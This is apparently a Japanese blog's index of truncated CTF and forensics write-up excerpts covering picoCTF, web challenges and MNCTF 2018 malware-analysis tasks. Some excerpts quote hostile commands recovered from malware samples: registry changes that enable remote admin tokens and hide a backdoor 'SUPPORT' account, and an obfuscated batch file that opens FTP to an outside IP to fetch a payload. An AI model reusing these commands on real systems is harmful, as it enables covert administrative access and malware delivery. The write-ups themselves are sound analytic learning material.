初めに 株式会社イエラエセキュリティさん主催の「オンライン・フォレンジックLT大会」に参加しました。 「オンライン・フォレンジックLT大会 – Emotetの巻」開催のお知らせ|株式会社イエラエセキュリティ - ハッカーによる脆弱性診断 Emotet感染端末のフォ…
環境が変わるごとにツールをインストールするのが面倒になってきたので、 DFIR系ディストリビューション使ってみたいと思い、SANSSIFTを入れることにしました。 しかし、日本語でインストール方法などを書いているページがなかったので、 この先インストール…
問題 My buddy Blaise told me he learned about this cool cipher invented by a guy also named Blaise! Can you figure out what it says? Connect with nc 2018shell.picoctf.com 18981. ヒント There are tools that make this easy. This cipher was N…
問題 This cat has a secret to teach you. You can also find the file in /problems/hex-editor_2_c1a99aee8d919f6e42697662d798f0ff on the shell server. 解き方 とりあえず、ncコマンドを実行してみます。 $ nc 2018shell.picoctf.com 18581 ----------…
nc 2018shell.picoctf.com 35225 に接続してみると、ログインを求められます。 Linuxのetc/passwdとect/shadowの内容が書かれたファイルが問題で与えられているので、それを参考にログインしていく問題です。 passwadファイルの中身を見てみると、ユーザーは…
$ nc 2018shell.picoctf.com 57659 What is your name? ctf Hello ctf, Please Enter the Password. ctf Incorrect Password! とりあえずサーバに接続してみましたが、ログインできません。 ソースコードを見てみます。 $ cat auth.c #include #include #inc…
URLにアクセスしてみます。この三つにアクセスするとこんな感じのページに移りますが、flagの文字はありませんでした。http://ctfq.sweetduet.info:10080/~q26/index.pl の一つ上のディレクトリ(http://ctfq.sweetduet.info:10080/~q26/)に入ってみます。f…
SQLインジェクションかと思って色々してみるも解けず。。。ほかの人のwriteupを見てみました。どうやらsqlite:database.db の database.dbは相対パスの表記らしいです。http://ctfq.sweetduet.info:10080/~q35/auth.phpのauth.phpをdatabase.dbに置き換えて…
この問題は自力で解けず、、、 ほかの人のwriteupみると、ssdeepというツールを使っていました。 ssdeepのインストールがうまくできなかったので、コマンドで色々絞りながら解くことにしました。 各ファイルの中身をみると、一行目だけ5文字程度の数字で、そ…
wiresharkで見てみます。 あきらかに怪しいHTTPの通信があります。 アクセスできそうなURLがありますが、できませんでした。。。 単純にgoogleで”gif malware image” と検索するとursnifというマルウェアの名前(フラグ)が見つかりました。
ls -lコマンドでディレクトリ内を見てみると、. のファイル?らしきものが。 このような名前のファイルをcatで見ようとしてもエラーになるので、後ろに*をつけて見てみます。 フラグがありました。
マルウェアをStringsコマンドで実行しました。 # strings AD_OptimizationTool.exe !This program cannot be run in DOS mode. .text .data @.import hO @ hK @ h| @ AD Optimizer Optimization successfuly finished.\nThe speed increased 176%. /c net us…
問題のzipファイルを展開すると実行ファイルが出てきました。 Linux環境でsha256sum <ファイル名>でSHA256ハッシュ値(フラグ)を求めました。 # sha256sum AD_OptimizationTool.exe f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29 AD_O…
前問のパケットをみると、ファイルをアップロードしているので、その脆弱性について調べたら以下のような記事がでてきました。
アクセスしてみます。 Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。 chromeで開いてるのに?? 調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。 F12→Network→NetworkConditionで…
ハッシュ値、ファイルサイズは以下のように求めました。 # md5sum AD_OptimizationTool.exe 541427a9dbe43b10c05b856cdcdc5ba6 AD_OptimizationTool.exe # sha1sum AD_OptimizationTool.exe e0fa838e0f191f97c5dac7a831af60d750432017 AD_OptimizationTool.e…
とりあえず、バイナリデータとしてダウンロードしたファイルを開きます。 最後のほうにexeファイルのURLがありました。
とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。 Apache Tomcatの「Common Gateway Interface(CGI)」サーブレットに関して、遠隔からのコード実行(Remote Code Execution、RCE)の脆弱性が確認されました。この深刻度の高い脆弱性が…
# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin 2018/07/13 15:01,vpnadmin,27.117.128.1 前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。
標的攻撃ⅡのフラグのPPORT_388945a1をネットで検索すると、 OceanLotusというグループ(フラグ)であることが分かる。
batファイルの続きにFTPサーバーへのアクセスが見えるので、アクセスしました。 if A%USERDOMAINJkjNCIMZMscrSkoGFOOM% echo open 157.7.53.197> temp.txt echo P455w0rd>> temp.txt REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed d…
前の問題で分かっているIPをググってみます。 2018/07/13 15:01,vpnadmin,27.117.128.1 韓国でした。
zipファイルを与えられたパスワードを使って解凍しました。 batファイルがあるので、VScodeで開いてみました。 %P%@%r%e%I%c%g%h%E%o%R% %I%o%y%f%J%f%L% %d%R%f%E%R%M%z% %y%T%z%O%g%O%M%L%l% %P%N%F%A%u%M%E%E%I%:%E% %Y% %E% %F%X%b%L%b%S%S%_%W%S%l%t%K%…
/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388…
設定シートを見てみると、1階のどこかかな?とあたりがつきます。PCAPファイルをWireSharkで開きます。 locationで検索してみます。かなり絞れたのでひとつずつ見ていきます。 1F_factory(フラグ)という文字列がASCIIにありました。
ディスクイメージファイル(diskimage.vmdk )を渡されるので、FTK Imagerで削除されたファイル等がないか見てみます。 rootディレクトリを見ると、a.exe というファイルが削除された痕跡があります。右クリックしてハッシュ値を取り出します。 ハッシュ値(…
サイトにアクセスすると、 パスワードファイルの password.php と、URLを入力するとHTTPのリクエストヘッダとレスポンスヘッダを表示してくれる webchecker.php というサイトのURLがあります。 パスワードファイルはみれませんでした。webcheckerのホスト名…
標的攻撃Ⅰで見つけた怪しい実行ファイルを、FTK Imagerを使ってエクスポートします。 マルウェアを実行するのは怖いですが、、、 Linux環境でstringsコマンドで実行しました。 # strings a.EXE !This program cannot be run in DOS mode. .text .data @.impo…
まずはファイルの拡張子はpngとなっているものの、画像ファイルとして開けないので、攻撃グループBlackTechが使うマルウエアPLEADダウンローダ(ヒントのサイト)のようにバイナリエディタで開くことにしました。 いつも使っているVisual Studio Codeの拡張…